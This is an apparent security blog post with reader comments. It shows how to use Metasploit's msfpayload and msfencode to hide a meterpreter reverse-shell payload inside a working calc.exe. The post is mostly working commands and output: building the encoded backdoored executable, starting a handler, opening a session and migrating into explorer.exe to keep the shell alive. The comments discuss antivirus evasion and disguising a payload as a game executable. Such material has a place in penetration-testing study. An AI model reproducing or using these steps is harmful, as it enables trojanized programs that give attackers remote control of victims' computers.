http://www.metasploit.com/redmine/projects/framework/repository/revisions/8896
This update allows you to msfencode a msfpayload into an existing executable and the new executable still function like the original. So if you inject into calc.exe you get calc.exe and your backdoor.
let's see the new msfencode options:
~/trunk$ ./msfencode -h
Usage: ./msfencode
OPTIONS:
-a
-b
-c
-e
-h Help banner
-i
-k Keep template working; run payload in new thread (use with -x)
-l List available encoders
-m
-n Dump encoder information
-o
-p
-s
-t
-x
Let's make our new backdoored executable.
~/trunk$ ./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.210.11 R | ./msfencode -t exe -x calc.exe -k -o calc_backdoor.exe -e x86/shikata_ga_nai -c 5
[*] x86/shikata_ga_nai succeeded with size 318 (iteration=1)
[*] x86/shikata_ga_nai succeeded with size 345 (iteration=2)
[*] x86/shikata_ga_nai succeeded with size 372 (iteration=3)
[*] x86/shikata_ga_nai succeeded with size 399 (iteration=4)
[*] x86/shikata_ga_nai succeeded with size 426 (iteration=5)
Get the backdoored exe on the other box and execute it. We have a functional calc.exe and our shell.
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.210.11
LHOST => 192.168.210.11
msf exploit(handler) > exploit
[*] Started reverse handler on 192.168.210.11:4444
[*] Starting the payload handler...
[*] Sending stage (748032 bytes)
[*] Meterpreter session 3 opened (192.168.210.11:4444 -> 192.168.210.11:51695)
Keep in mind that you'll still need to migrate away from the backdoored executable process because if they close the exe you lose your shell.
meterpreter > getuid
Server username: WINXPSP3\user
meterpreter > run migrate explorer.exe
[*] Current server process: calc_backdoor.exe (3360)
[*] Migrating to explorer.exe...
[*] Migrating into process ID 1592
[*] New server process: Explorer.EXE (1592)
meterpreter > getuid
Server username: WINXPSP3\user
meterpreter > getpid
Current pid: 1592
meterpreter >
NICE...you are my hero!
ReplyDeleteNice one bro...
ReplyDeleteThe detection rate goes up for the packed executables and not every exe is working, i've tried the same with notepad and it just crashes.
ReplyDeletedinos,
ReplyDeletei'd go read the notes on the svn revision and the support ticket as well as the patch. there are a few caveats.
This has been killing me the past couple of days! I was trying the same thing and using notepad and nothing but crashes with Win7. Now it works like a charm! Thanks for the post! Helped a lot and saved a lot of frustration.
ReplyDeleteIt works for me through the firewall and with anti-virus fired up..however..calc or notepad are not opening,,,what am I doing wrong???
ReplyDeleteDude, nearly all the metasploit payloads are easily being spotted by many of the AV vendors... There is no point in embedding it into a legitimate executable. Metasploit should have obfuscation options for making its payloads more stealthy... This is what Metasploit only lacks..
ReplyDeletei'm sure they are taking patches...
ReplyDeletegood stuff mate! keep it up
ReplyDeleteim having an issue with this. the error i get is this when i type this in:
ReplyDelete./msfpayload windows/meterpreter/reverse_http LHOST=192.168.250.104 R | ./msfencode -t exe -x ~/game.exe -k -o ~/tetris.exe -e x86/shikata_ga_nai -c 2
x86/shikata_ga_nai failed: Not enough room for new section header
I have researched this as much as i can and i still cant figure this out. any ideas?
not sure, hit up the IRC channel or the mail list
ReplyDelete